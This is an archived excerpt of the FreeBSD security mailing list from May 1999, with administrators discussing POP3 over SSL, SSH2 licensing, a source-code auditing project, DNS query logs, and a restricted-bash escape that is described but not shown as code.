Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 0607515043 for ; Sat, 29 May 1999 20:13:10 -0700 (PDT) (envelope-from ncb@zip.com.au)
Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14706; Sun, 30 May 1999 13:13:17 +1000
Date: Sun, 30 May 1999 13:13:16 +1000 (EST)
From: Nicholas Brawn
To: Tushar Patel
Cc: security@FreeBSD.ORG
Subject: Re: POP3 server with SSL
In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Last year I patched qpopper to use SSL. It seemed to work fine, but I never
did get around to trying/writing a proper mail fetcher, or testing whether
mail clients that supported SSL could log in properly. Anyway, it would
depend on your end users, and whether their clients would be able to
download mail adequately.

Grab SSL from www.openssl.org and have a tinker. :)

Cheers,
Nick

On Sat, 29 May 1999, Tushar Patel wrote:
> Hi,
>
> We need to allow a few people to access their pop3 e-mail over a
> secure connection.
> Is there a way to run a pop3 server with SSL support?
> Any pointers would be a great help.
>
> Thanks,
> Tushar
> tpatel @ ecpi.com

From owner-freebsd-security Sat May 29 20:16:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 1F8F514D1C for ; Sat, 29 May 1999 20:16:39 -0700 (PDT) (envelope-from ncb@zip.com.au)
Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14750; Sun, 30 May 1999 13:16:35 +1000
Date: Sun, 30 May 1999 13:16:34 +1000 (EST)
From: Nicholas Brawn
To: Unknow User
Cc: security@FreeBSD.ORG
Subject: Re: System beeing cracked!
In-Reply-To: <3750761E.7033F669@tdnet.com.br>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

http://www.false.com/security/ and ftp.freelsd.net/pub/john/

Nick

On Sat, 29 May 1999, Unknow User wrote:
> Can anybody point me to where I can download John?
>
> Paul Hart wrote:
>
> > Yes, I would second that opinion. John the Ripper understands many of the
> > non-DES crypt replacements used in various UNIX versions, such as
> > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly
> > language versions of the hashing algorithms on many target architectures.
>
> --
> "The box said 'Requires Windows 98, NT, Linux or better' so I
> installed FreeBSD."

From owner-freebsd-security Sat May 29 20:19:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id CD09314E61 for ; Sat, 29 May 1999 20:19:33 -0700 (PDT) (envelope-from ncb@zip.com.au)
Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14769; Sun, 30 May 1999 13:19:23 +1000
Date: Sun, 30 May 1999 13:19:22 +1000 (EST)
From: Nicholas Brawn
To: Bryan Fullerton
Cc: Dag-Erling Smorgrav , "Harry M. Leitzell" , Fernando Schapachnik , freebsd-security@FreeBSD.ORG
Subject: Re: SFTP (was Re: legal notice for telnet/etc)
In-Reply-To: <19990529125832.B435@samurai.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

AFAIK, the protocol is public; only the implementation available from
ssh.fi is restricted to non-commercial use.

Nick

On Sat, 29 May 1999, Bryan Fullerton wrote:
> On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote:
> > "Harry M. Leitzell" writes:
> > > I am personally curious as to whether or not someone has developed
> > > a free SSH2 daemon yet.
> >
> > That's a contradiction in terms. AFAIK, the SSH2 protocol is
> > proprietary.
>
> That would surprise the IETF. See http://www.net.lut.ac.uk/psst/ for links to
> the IETF working group documents regarding making the ssh2 protocol an
> Internet standard, as well as links to a GPL'ed ssh2 implementation (in early
> development - currently at v0.1).
>
> Bryan
>
> --
> Bryan Fullerton http://www.samurai.com/
> Core Competency
> Samurai Consulting
> "No, we don't do seppuku." Can you feel the Ohmu call?

From owner-freebsd-security Sat May 29 21:42:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from server.mindstep.com (cr480472-a.slnt1.on.wave.home.com [24.112.33.138]) by hub.freebsd.org (Postfix) with SMTP id 515E31519D for ; Sat, 29 May 1999 21:41:46 -0700 (PDT) (envelope-from patrick@mindstep.com)
Received: (qmail 49212 invoked from network); 30 May 1999 04:41:45 -0000
Received: from pm6100.local.mindstep.com (HELO ?192.168.55.3?)
(192.168.55.3) by local.mindstep.com with SMTP; 30 May 1999 04:41:45 -0000
X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410)
Date: Sun, 30 May 1999 00:41:44 -0400
Subject: Re: POP3 server with SSL
From: "Patrick Bihan-Faou"
To: security@FreeBSD.ORG
Mime-version: 1.0
X-Priority: 3
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Message-Id: <19990530044147.515E31519D@hub.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

On Sat, 29 May 1999, Tushar Patel wrote:
> We need to allow a few people to access their pop3 e-mail over a
> secure connection.
> Is there a way to run a pop3 server with SSL support?
> Any pointers would be a great help.

Actually this is really easy to implement using the "stunnel" package (look
in the ports area under security) and the "OpenSSL" package (used to be
SSLeay). With this combination, you can provide any service you want over
SSL and you don't have to recompile anything.

Beware though that not too many clients do POP3 over SSL. Notably Netscape
does not do it: it only supports IMAP over SSL.

There is also a package named bjorb that does the same thing as stunnel, but
I did not manage to make it work.

Have fun,

Patrick.

--
Patrick Bihan-Faou, email: patrick.bihan-faou@mindstep.com
MindStep Corporation tel: (613) 526 5062 fax: (613) 526 2417 web: www.mindstep.com

From owner-freebsd-security Sat May 29 23:39:36 1999
Delivered-To: freebsd-security@freebsd.org
Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id 8D1F015200 for ; Sat, 29 May 1999 23:39:33 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com)
Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nzFs-000Osc-00 for freebsd-security@freebsd.org; Sun, 30 May 1999 09:39:32 +0300
From: Vladimir Litovka
To: freebsd-security@freebsd.org
Reply-To: Vladimir Litovka
Subject: Re: POP3 server with SSL
Date: 30 May 1999 06:39:31 GMT
Message-ID: <7iqmf3$2tcc$1@news.kiev.sovam.com>
References: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com>
X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport)
X-Gated-By: news2list v1.3-pl1, (c) Vladimir Litovka
X-Gated-Date: Sun May 30 06:39:32 1999 GMT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Tushar Patel" wrote:
> Is there a way to run a pop3 server with SSL support?
> Any pointers would be a great help.

Why not use the Cyrus IMAP server, which also has pop3d support? Cyrus
supports SSL, so you can get many good services in one box :-)

The latest version of the Cyrus server is in ports/mail/cyrus

-- doka

From owner-freebsd-security Sun May 30 8:11:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3CC8914D23 for ; Sun, 30 May 1999 08:11:18 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA14812; Sun, 30 May 1999 17:11:08 +0200 (CEST) (envelope-from des)
To: "Jan B. Koum "
Cc: William Woods , Justin Wolf , FreeBSD Security
Subject: Re: System beeing cracked!
References: <006201bea999$ee5e4b00$06c3fe90@cisco.com> <000001beaa1c$3b44bf80$264b93cd@william> <19990529170325.A28298@best.com>
From: Dag-Erling Smorgrav
Date: 30 May 1999 17:11:04 +0200
In-Reply-To: "Jan B. Koum "'s message of "Sat, 29 May 1999 17:03:25 -0700"
Message-ID:
Lines: 12
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Jan B. Koum " writes:
> On the other hand, if someone cracks root and you have LKM (or KLD) enabled,
> a skilled attacker can just insert a bpf module into a running system, I
> would guess. There is a paper on how to abuse LKM under Linux at:

No. The network drivers don't pass packets to bpf_tap() unless NBPFILTER
was defined and non-zero at compile time. Even if you could load a bpf
module, it wouldn't receive any data.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Sun May 30 18:22: 2 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 2496215342 for ; Sun, 30 May 1999 18:20:29 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com)
Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id VAA23947 for ; Sun, 30 May 1999 21:23:22 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com)
Date: Sun, 30 May 1999 21:23:22 -0400 (EDT)
From: Bill Fumerola
Reply-To: Bill Fumerola
To: freebsd-security@FreeBSD.org
Subject: auditors
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The file www/en/auditors.sgml is out of date (slightly). I'd fix it, but I
wonder if it's even a valid page (because of its lack of references, etc.).

If it is a valid page, then it should be updated and referenced somewhere
in the web site. (Nothing links to it.) Perhaps in
www/en/security/securty.sgml, I don't know. Maybe in the handbook or FAQ.

Opinions?

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Sun May 30 23:48: 0 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apotheosis.za.org (apotheosis.za.org [137.158.128.27]) by hub.freebsd.org (Postfix) with ESMTP id 1BE7214CFE for ; Sun, 30 May 1999 23:47:49 -0700 (PDT) (envelope-from lonewolf@apotheosis.za.org)
Date: Mon, 31 May 1999 08:46:56 +0200
From: Lonewolf
To: Tushar Patel
Cc: security@FreeBSD.ORG
Subject: Re: POP3 server with SSL
Message-ID: <19990531084656.A76032@apotheosis.za.org>
References: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com>; from "Tushar Patel" on Sat, May 29, 1999 at 06:56:53PM
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, May 29, 1999 at 06:56:53PM -0500, Tushar Patel wrote:
> We need to allow a few people to access their pop3 e-mail over a secure
> connection.
> Is there a way to run a pop3 server with SSL support?
> Any pointers would be a great help.

I found the following to be very helpful:

Learning SSL the Hard Way - http://www.dtcc.edu/cs/admin/notes/ssl/

There's also SSL Wrap: http://www.rickk.com/sslwrap/

--
lonewolf@apotheosis.za.org

From owner-freebsd-security Mon May 31 0:40:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 1635A14CA2 for ; Mon, 31 May 1999 00:40:28 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu)
Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA28418 for freebsd-security@freebsd.org; Mon, 31 May 1999 09:40:27 +0200 (MET DST)
Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00388 for freebsd-security@freebsd.org; Mon, 31 May 1999 09:35:14 +0200 (CEST) (envelope-from zgabor)
From: Zahemszky Gabor
Message-Id: <199905310735.JAA00388@CoDe.hu>
Subject: Re: POP3 server with SSL
In-Reply-To: <19990530044147.515E31519D@hub.freebsd.org> from Patrick Bihan-Faou at "May 30, 99 00:41:44 am"
To: freebsd-security@freebsd.org
Date: Mon, 31 May 1999 09:35:14 +0200 (CEST)
X-Mailer: ELM [version 2.4ME+ PL38 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Hi,
>
> On Sat, 29 May 1999, Tushar Patel wrote:
>
> > We need to allow a few people to access their pop3 e-mail over a
> > secure connection.
> > Is there a way to run a pop3 server with SSL support?
> > Any pointers would be a great help.
>
> Actually this is really easy to implement using the "stunnel" package (look
> in the ports area under security) and the "OpenSSL" package (used to be
> SSLeay).

And there is another one: sslproxy. It isn't in the ports/packages yet, but
you can compile and use it. And! It has a Windows version, too. By the way,
I can't remember the exact URL, but it is from somewhere in Austria.

ZGabor at CoDe dot HU

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ??
]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

From owner-freebsd-security Mon May 31 1:27:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 7EFAA14F35 for ; Mon, 31 May 1999 01:27:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id KAA08381; Mon, 31 May 1999 10:27:21 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id KAA54015; Mon, 31 May 1999 10:27:21 +0200 (MET DST)
Date: Mon, 31 May 1999 10:27:21 +0200
From: Eivind Eklund
To: Bill Fumerola
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: auditors
Message-ID: <19990531102721.F51991@bitbox.follo.net>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.1i
In-Reply-To: ; from Bill Fumerola on Sun, May 30, 1999 at 09:23:22PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, May 30, 1999 at 09:23:22PM -0400, Bill Fumerola wrote:
> The file www/en/auditors.sgml is out of date (slightly). I'd fix it, but I
> wonder if it's even a valid page (because of its lack of references, etc.)
>
> If it is a valid page, then it should be updated and referenced somewhere
> in the web site. (Nothing links to it.) Perhaps in
> www/en/security/securty.sgml, I don't know. Maybe in the handbook or FAQ.
>
> Opinions?

The auditing project has been dead/sleeping for a *long* while. If it
should be revived, the first thing to do would be to merge over the
OpenBSD fixes, and then have somebody actually *lead* the auditing
project.

Eivind.

From owner-freebsd-security Mon May 31 2:31:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from exchns01.PQAFRICA.CO.ZA (mail.pqafrica.co.za [196.29.130.34]) by hub.freebsd.org (Postfix) with ESMTP id D7D5E14F36 for ; Mon, 31 May 1999 02:31:14 -0700 (PDT) (envelope-from psivbl@psimr.persetel.co.za)
Received: by mail.pqafrica.co.za with Internet Mail Service (5.5.2448.0) id ; Mon, 31 May 1999 11:21:32 +0200
Message-ID: <501BF453CDCFD111A6E40080C83DAC041308C9@PSICS001>
From: Vikash Badal *
To: "'freebsd-security@FreeBSD.ORG'"
Subject: restricted bash
Date: Mon, 31 May 1999 11:34:45 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Greetings

Can anyone assist me with implementing a restricted bash shell?

Currently I am testing a restricted bash shell using bash 2.01 with the -r
option. After creating 64 processes I get a "fork : Resource temporary
unavailable" error and cannot execute any command. I have used this error to
gain access to an unrestricted bash shell.

Is there any way I can prevent anyone from logging in when a "resource
temporary unavailable" error occurs?

The kernel is currently 2.2.5, the restricted shell uses ssh version 1.26 to
log into the rest of the network, and the box will act as a firewall of
sorts. I cannot recompile the kernel as the box was really stripped down by
my predecessor.

Thanks
Vikash

NaTIS Information System Security
Vikash Badal
System Security Administrator
Tel : 011-256-1028
Cell: 082-979-3818
Email: psivbl@psimr.persetel.co.za

From owner-freebsd-security Mon May 31 2:35:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alexander.pentalpha.com.hk (pop3.pentalpha.com.hk [210.176.109.1]) by hub.freebsd.org (Postfix) with ESMTP id 4E7E314D9B; Mon, 31 May 1999 02:35:08 -0700 (PDT) (envelope-from danny@pentalpha.com.hk)
Received: (from uucp@localhost) by alexander.pentalpha.com.hk (8.9.3/8.9.3) id RAA39218; Mon, 31 May 1999 17:35:07 +0800 (CST) (envelope-from danny@pentalpha.com.hk)
Received: from danny.pentalpha.com.hk(10.0.0.111), claiming to be "domain" via SMTP by alexander.pentalpha.com.hk, id smtpdd39214; Mon May 31 17:35:07 1999
Message-ID: <04f901beab48$d91ffda0$6f00000a@domain.pentalpha.com.hk>
From: "danny"
To: ,
Subject: named.run
Date: Mon, 31 May 1999 17:34:57 +0800
MIME-Version: 1.0
Content-Type: text/plain; charset="big5"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I found a file named.run in /etc/namedb and the file size is very large. It
is a log file of all DNS queries. Did I set something wrong, or am I under
attack?

Danny

From owner-freebsd-security Mon May 31 5:14:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 5B19514E66 for ; Mon, 31 May 1999 05:14:24 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar)
Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA29125; Mon, 31 May 1999 09:13:17 -0300 (GMT)
Message-Id: <199905311213.JAA29125@ns1.sminter.com.ar>
Subject: Re: POP3 server with SSL
In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> from Tushar Patel at "May 29, 99 06:56:53 pm"
To: tpatel@ecpi.com (Tushar Patel)
Date: Mon, 31 May 1999 09:13:17 -0300 (GMT)
Cc: security@FreeBSD.ORG
From: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If there are really only a few, you can use SSH port forwarding. Create an
account named, say, ssh on your machine and give it a shell like /bin/cat.
Firewall your machine so you can't receive POP3 via ethernet.

All that clients must do is establish an SSH session to your machine and
use the ssh account to log in. Then they must set up a forwarding like
-L 110:your.ip.address:110 and configure their POP3 client to use localhost
as the POP3 server.

Hope this helps!

Regards.

In an earlier message, Tushar Patel wrote:
> Hi,
>
> We need to allow a few people to access their pop3 e-mail over a
> secure connection.
> Is there a way to run a pop3 server with SSL support?
> Any pointers would be a great help.
>
> Thanks,
> Tushar
> tpatel @ ecpi.com

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA
Diagonal Roque Sáenz Peña 971, 4º y 5º piso.
1035 - Capital Federal, Argentina.
(54-11) 4323-3333
http://www.via-net-works.net.ar

From owner-freebsd-security Mon May 31 5:16:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 6A76A14E66; Mon, 31 May 1999 05:16:12 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar)
Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA00824; Mon, 31 May 1999 09:16:21 -0300 (GMT)
Message-Id: <199905311216.JAA00824@ns1.sminter.com.ar>
Subject: Re: named.run
In-Reply-To: <04f901beab48$d91ffda0$6f00000a@domain.pentalpha.com.hk> from danny at "May 31, 99 05:34:57 pm"
To: danny@pentalpha.com.hk (danny)
Date: Mon, 31 May 1999 09:16:21 -0300 (GMT)
Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG
From: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

You can signal named to dump its cache. Are you sure you didn't kill -INT it
by mistake?

Regards.

In an earlier message, danny wrote:
> I found a file named.run in /etc/namedb and the file size is very large. It
> is a log file of all DNS queries. Did I set something wrong, or am I under
> attack?
>
> Danny

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA
Diagonal Roque Sáenz Peña 971, 4º y 5º piso.
1035 - Capital Federal, Argentina.
(54-11) 4323-3333
http://www.via-net-works.net.ar

From owner-freebsd-security Mon May 31 6:41:36 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id E6D9314BF1 for ; Mon, 31 May 1999 06:41:26 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id RAA29411 for ; Mon, 31 May 1999 17:41:24 +0400 (MSD)
Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id RAA26314 for ; Mon, 31 May 1999 17:41:22 +0400 (MSD)
Date: Mon, 31 May 1999 17:41:21 +0400 (MSD)
From: "Ilmar S. Habibulin"
To: freebsd-security@FreeBSD.ORG
Subject: Re: auditors
In-Reply-To: <19990531102721.F51991@bitbox.follo.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 31 May 1999, Eivind Eklund wrote:
> The auditing project has been dead/sleeping for a *long* while. If it
> should be revived, the first thing to do would be to merge over the
> OpenBSD fixes, and then have somebody actually *lead* the auditing
> project.

And what about POSIX auditing? Robert Watson made a POSIX.1e audit
implementation for FreeBSD. Why not use his work?

From owner-freebsd-security Mon May 31 10:37:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id 5788515691 for ; Mon, 31 May 1999 10:37:37 -0700 (PDT) (envelope-from ben@narcissus.net)
Received: by narcissus.net (Postfix, from userid 1000) id ED630194; Mon, 31 May 1999 13:28:23 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id E0AD318B; Mon, 31 May 1999 13:28:23 -0400 (EDT)
Date: Mon, 31 May 1999 13:28:23 -0400 (EDT)
From: Snob Art Genre
To: "Ilmar S. Habibulin"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: auditors
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 31 May 1999, Ilmar S. Habibulin wrote:
> On Mon, 31 May 1999, Eivind Eklund wrote:
>
> > The auditing project has been dead/sleeping for a *long* while. If it
> > should be revived, the first thing to do would be to merge over the
> > OpenBSD fixes, and then have somebody actually *lead* the auditing
> > project.
>
> And what about POSIX auditing? Robert Watson made a POSIX.1e audit
> implementation for FreeBSD. Why not use his work?

Different kind of auditing. The first is people vetting code for
security flaws, the second is logging of system events.

Ben
@narcissus.net

--
finally

From owner-freebsd-security Mon May 31 12:26: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 105DF14C06; Mon, 31 May 1999 12:24:40 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com)
Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id PAA00206; Mon, 31 May 1999 15:27:34 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com)
Date: Mon, 31 May 1999 15:27:34 -0400 (EDT)
From: Bill Fumerola
To: Eivind Eklund
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: auditors
In-Reply-To: <19990531102721.F51991@bitbox.follo.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 31 May 1999, Eivind Eklund wrote:
> The auditing project has been dead/sleeping for a *long* while. If it
> should be revived, the first thing to do would be to merge over the
> OpenBSD fixes, and then have somebody actually *lead* the auditing
> project.

I could help merge the userland fixes; however, I am not the one to lead
this.

Takers?

Should I retire this file to the attic until something comes up?

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Mon May 31 12:28: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from unix.kawartha.com (unix.kawartha.com [204.101.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 3A87F14C06; Mon, 31 May 1999 12:28:01 -0700 (PDT) (envelope-from support@kawartha.com)
Received: from kawartha.com (earth.kawartha.com [204.101.15.14]) by unix.kawartha.com (8.9.1/8.8.7) with ESMTP id PAA22029; Mon, 31 May 1999 15:25:30 -0400 (EDT)
Message-ID: <3752E3AA.2DFB5E02@kawartha.com>
Date: Mon, 31 May 1999 15:31:54 -0400
From: OCD Support
X-Mailer: Mozilla 4.6 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Bill Fumerola
Cc: Eivind Eklund , freebsd-security@FreeBSD.ORG
Subject: Re: auditors
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Could someone please explain more about what the auditing project is? My
understanding is that it would be a project which keeps track of how many
FreeBSD installs there are and maybe what people are using FreeBSD for?

Thanks,

Paul Stewart

Bill Fumerola wrote:
> On Mon, 31 May 1999, Eivind Eklund wrote:
>
> > The auditing project has been dead/sleeping for a *long* while. If it
> > should be revived, the first thing to do would be to merge over the
> > OpenBSD fixes, and then have somebody actually *lead* the auditing
> > project.
>
> I could help merge the userland fixes; however, I am not the one to lead
> this.
>
> Takers?
>
> Should I retire this file to the attic until something comes up?
>
> - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
> - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Mon May 31 13: 3: 6 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id DAE25151EA; Mon, 31 May 1999 13:01:29 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com)
Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id QAA13357; Mon, 31 May 1999 16:03:47 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com)
Date: Mon, 31 May 1999 16:03:47 -0400 (EDT)
From: Bill Fumerola
To: OCD Support
Cc: Eivind Eklund, freebsd-security@FreeBSD.ORG
Subject: Re: auditors
In-Reply-To: <3752E3AA.2DFB5E02@kawartha.com>

On Mon, 31 May 1999, OCD Support wrote:

> Could someone please explain more about what the auditing project is? My
> understanding is that it would be a project which keeps track of how many
> FreeBSD installs there are and maybe what people are using FreeBSD for?

Nope. It is for auditing (checking for security problems) code in FreeBSD.

http://www.FreeBSD.org/auditors.html should give you an outdated overview.

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Mon May 31 13:15:24 1999
Date: Tue, 1 Jun 1999 00:14:13 +0400 (MSD)
From: "Ilmar S. Habibulin"
To: Snob Art Genre
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: auditors

On Mon, 31 May 1999, Snob Art Genre wrote:

> > And what about posix auditing? Robert Watson made a posix.1e audit
> > implementation for freebsd. Why not use his work?
>
> Different kind of auditing. The first is people vetting code for
> security flaws, the second is logging of system events.

Oh, I suppose I misunderstood the term "auditing". You were talking about
source code auditing?

From owner-freebsd-security Mon May 31 13:37:31 1999
